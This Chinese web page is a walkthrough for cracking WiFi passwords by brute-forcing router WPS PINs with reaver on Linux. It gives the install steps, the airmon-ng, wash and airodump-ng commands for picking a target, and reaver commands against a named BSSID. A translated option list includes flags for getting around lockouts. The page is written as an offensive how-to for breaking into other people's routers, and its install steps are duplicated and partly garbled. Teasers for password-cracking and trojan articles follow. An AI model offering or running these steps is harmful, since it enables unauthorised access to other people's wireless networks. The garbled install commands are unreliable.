在linux下使用reaver破解无线wifi密码的步骤

所属分类: 网络安全 / 工具使用 阅读数: 132
收藏 0 赞 0 分享
需要工具:reaver
原理:穷举PIN码以攻破无线路由器的安全防护
安装:
 下载源码
从这个网址下载reaver源代码http://code.google.com/p/reaver-wps
wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
 
 
解压
tar-xzvf reaver-1.4.tar.gz
 
安装必要的软件依赖库和工具
在您编译reaver前需要先安装pcaplib等工具,后面还需要aircrack-ng
sudo  apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
 
编译和安装
 
配置和编译Reaver
 
cd  reaver-1.4
cd  src
./configure
make
下载aircrack-ng源代码并编译
从Ubuntu12.04版本开始aircrack-ng不再被包含在版本软件仓库中,不过我们可以从网上下载它的源代码进行编译安装。如果aircrack-ng已经存在,则不必安装。./configure
make
sudo install
解压 tar -xzvf reaver-1.4.tar.gz
 
安装必要的软件依赖库和工具

在您编译 reaver前需要先安装 pcaplib等工具,后面还需要 aircrack-ng sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev

编译和安装

配置和编译 Reaver
cd reaver-1.4 cd src ./configure make
安装 Reaver
sudo make install

方法:

1 输入:airmon-ng start wlan0 开启监听模式 (屏幕显示 加载8187L驱动成功–一次就加载成功啊!)
2 输入:wash -i mon0 -C 查看所有开启WPS的无线路由 长时间无反应按Ctrl+C,结束进程,这时记下你要PJ的目标路由MAC.
3 输入:airodump-ng mon0 网卡以混杂模式扫描所有频道—并显示所有AP的信息(包括 AP的信号强度,ESSID,MAC,频道,加密方式,等等…..),按Ctrl+C,结束扫描.
注:如果你已知对方无线路由信息 第2,第3步 可省略!
4 输入:reaver -i mon0 -b MAC -a -S -vv 开始穷举pin码
注:随时可以按CTRL+C退出保存进程,下次按下光标控制键“上”键然后回车,进程可继续。
实战我输入了reaver -i mon0 -b MACD8:5D:4C:37:78:F6 -a -S -vv -d 0 ( 多加了 -d 0 加快速度 ),只见屏幕飞闪……爽啊!

reaver 参数详解

必须参数

-i, –interface=<wlan> Name of the monitor-mode interface to use
网卡的监视接口,通常是mon0
-b, –bssid=<mac> BSSID of the target AP
AP的MAC地址
Optional Arguments: 可选参数
-m, –mac=<mac> MAC of the host system
指定本机MAC地址
-e, –essid=<ssid> ESSID of the target AP
路由器的ESSID,一般不用指定
-c, –channel=<channel> Set the 802.11 channel for the interface (implies -f)
信号的频道,如果不指定会自动扫描
-o, –out-file=<file> Send output to a log file [stdout]
输出日志文件
-s, –session=<file> Restore a previous session file
恢复进度文件
-C, –exec=<command> Execute the supplied command upon successful pin recovery
pin成功后执行命令
-D, –daemonize Daemonize reaver
设置reaver成Daemon
-a, –auto Auto detect the best advanced options for the target AP
对目标AP自动检测高级参数
-f, –fixed Disable channel hopping
禁止频道跳转
-5, –5ghz Use 5GHz 802.11 channels
使用5G频道
-v, –verbose Display non-critical warnings (-vv for more)
显示不重要警告信息 -vv 可以显示更多
-q, –quiet Only display critical messages
只显示关键信息
-h, –help Show help
显示帮助
Advanced Options:高级选项
-p, –pin=<wps pin> Use the specified 4 or 8 digit WPS pin
使用指定的4位或者8位pin码
-d, –delay=<seconds> Set the delay between pin attempts [1]
pin间延时,默认1秒
-l, –lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
AP锁定WPS后等待时间
-g, –max-attempts=<num> Quit after num pin attempts
最大pin次数
Reaver 参数
—天天
-x, –fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
10次意外失败后等待时间,默认0秒
-r, –recurring-delay=<x:y> Sleep for y seconds every x pin attempts
每x次pin后等待y秒
-t, –timeout=<seconds> Set the receive timeout period [5]
收包超时,默认5秒
-T, –m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
M5/M7超时,默认0.2秒
-A, –no-associate Do not associate with the AP (association must be done by another application)
 
不连入AP(连入过程必须有其他程序完成)
-N, –no-nacks Do not send NACK messages when out of order packets are received
不发送NACK信息(如果一直pin不动,可以尝试这个参数)
-S, –dh-small Use small DH keys to improve crack speed
使用小DH关键值提高速度(推荐使用)
-L, –ignore-locks Ignore locked state reported by the target AP
忽略目标AP报告的锁定状态
-E, –eap-terminate Terminate each WPS session with an EAP FAIL packet
每当收到EAP失败包就终止WPS进程
-n, –nack Target AP always sends a NACK [Auto]
对目标AP总是发送NACK,默认自动
-w, –win7 Mimic a Windows 7 registrar [False]
模拟win7注册,默认关闭
Ps:影响到无线的因素很多,所以各参数之间的配合很重要,当然,最关键的还是取决于信号。
原理详细:
什么是PIN码?
印在无线路由器设备标签上的一组8位数字字符串,无线路由器管理界面中当然也会存在并可更改。
PIN码有什么用?
在无线网卡的配套管理软件(如TP-LINK的QSS软件)里输入无线路由器设备上的那8位数字字符串就可以成功登录该已被加密的无线路由器。
穷举PIN码是什么意思?
既然知道了无线路由器PIN值的范围(8位纯数字),且目前大部分设备的WPS是呈开启状态的,那么穷举PIN码以攻破无线路由器的安全防护这一暴力行为就有了*理论*可行性
更多精彩内容其他人还在看

流影使用说明

一、流影简介流影是一个和流光功能相似的工具,和流光最大的不同在于,流光是运行于用户主机也就是客户端的,是一个图形界面的工具,而流影可以同时运行于服务器端和客户端的工具。用户可以通过telnet来进行远程管理和控制。二、控制命令流影的全部设置通过Telnet来进
收藏 0 赞 0 分享

关于webscanner的分析

前几天风起用这给扫描软件扫了某些国内的网站,也包括了我们自己的网站,然后说了我们网站的安全问题,后来我仔细看了扫出来的漏洞报告,也把这个软件使用了一下,发现这个软件扫出来的报告并不一定准确,所报告的漏洞也不一定会有危险这个程序是一个相当简单的程序,
收藏 0 赞 0 分享

Nmap网络安全扫描器说明

Nmap网络安全扫描器说明(Linux )信息来源:苏樱作者:Fyodor 译者:quack名称: nmap - 网络勘察工具和安全扫描器摘要nmap [扫描类型] [选项] <主机或网络 #1 ... [#N]>描述nmap被开发用于允许系统管理员察看一个大的网络系
收藏 0 赞 0 分享

溯雪使用说明

一、关于溯雪1、由于种种原因,溯雪是一个英文的版本,欢迎有兴趣的朋友汉化。2、此次的说明书仅仅是一个快速的使用指南,如果您有兴趣,可以帮我写一个。如果没有人愿意写的话,那只好我自己写了。:-(3、这是一个免费的产品。二、溯雪可以做什么1、对免费信箱的探测,
收藏 0 赞 0 分享

Telnet密码破解软件Letmein1.0说明

首先启动 LetMeIn! V1.0, 我们先假设在 nowhere.unix.net 中有一个帐号叫作 guest使用的密码为 guest003, 且我们有一个 dic.txt 档案, 内含有字典档, 其内容为:-----Cut here DIC.TXT ------guest
收藏 0 赞 0 分享

Nmap网络安全扫描器说明(5)

Nmap网络安全扫描器说明(5) 作者:作者:Fyodor 译者:quack发布日期:2002-2-6上传日期:2002-2-6来源:不详扫描范例--------*这里是一些运用nmap的扫描范例,从最简单普通的到有一些复杂的例子都有。注意这里有真实的数字以及一些真实的域名——这
收藏 0 赞 0 分享

Nmap网络安全扫描器说明(3)

Nmap网络安全扫描器说明(3) 作者:作者:Fyodor 译者:quack发布日期:2002-2-6上传日期:2002-2-6来源:不详常规选项--------*这些选项并非必需的,但有些会非常实用。-P0 在扫描前不尝试或者PING主机,这是用来扫描那些不允许ICMP ech
收藏 0 赞 0 分享

不需要任何密码就能达到进入中有冰河的机器!!!

不需要任何密码就能达到进入中有冰河的机器!!!小飞刀 [[冰河第一站]]冰河出现到现在,使用得如此之广,影响如此之大。 却万万没有人想到冰河服务端竟然存在着如此严重的漏洞:“不需要任何密码就可以将本地文件在远程机器上打开!!!” 漏洞一:不需要密码远程运行本地文
收藏 0 赞 0 分享

Nmap网络安全扫描器说明(2)

Nmap网络安全扫描器说明(2) 作者:作者:Fyodor 译者:quack发布日期:2002-2-6上传日期:2002-2-6来源:不详扫描类型--------*-sT TCP connect()扫描:这是对TCP的最基本形式的侦测。在该操作下,该connect()对目标主机上
收藏 0 赞 0 分享

Nmap网络安全扫描器说明(4)

Nmap网络安全扫描器说明(4) 作者:作者:Fyodor 译者:quack发布日期:2002-2-6上传日期:2002-2-6来源:不详定时选项--------*虽然nmap在一般情况下都能够很好地在运行时间里尽可能迅速地完成扫描任务,但偶尔还是会有一些主机/端口无法侦测,这可
收藏 0 赞 0 分享
查看更多